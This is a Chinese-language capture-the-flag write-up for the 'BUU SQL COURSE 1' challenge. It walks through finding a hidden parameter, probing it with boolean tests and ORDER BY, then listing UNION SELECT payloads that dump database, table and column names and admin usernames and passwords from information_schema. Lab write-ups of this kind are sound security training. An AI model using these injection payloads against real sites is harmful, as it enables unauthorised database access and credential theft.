码迷,mamicode.com
首页 > 数据库 > 详细

BUU SQL COURSE 1

时间:2021-05-03 13:20:58      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:code   抓包   登录   orm   理想   注入   height   隐藏   sel   

0x01 题目分析

通过题目可以了解到这是一个SQL注入的题,但是打开网站后观察URL、对登录框抓包尝试后都无果。

技术图片

 

 这时就很迷,最后只能用老办法看看源码啥的有没有提示

 经过观察发现了一个隐藏的URL(心理想:这题是真的鬼[○?`Д′? ○])

技术图片

 

0x02 开始测试

 利用and 1=1 和 and 1=2根据页面回显进行判断

技术图片

 

 技术图片

 

利用order by 进行字段查看

技术图片

 

 进行回显判断

技术图片

 

 下面就可以进行暴库、暴表、暴字段的操作了

 1 暴库:(information_schema,ctftraining,mysql,performance_schema,test,news)
 2 ?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata
 3 
 4 暴表:(admin,contents)
 5 ?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news"
 6 
 7 暴字段:(id,username,password)
 8 ?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin"
 9 
10密码:
11 ?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin

Mysql中concat和group_concat的用法:https://baijiahao.baidu.com/s?id=1595349117525189591&wfr=spider&for=pc

 

最后出来了账号密码:

技术图片

 

 利用账号密码进行登录

技术图片

 

BUU SQL COURSE 1

标签:code   抓包   登录   orm   理想   注入   height   隐藏   sel   

原文地址:https://www.cnblogs.com/nmlwh/p/14724551.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!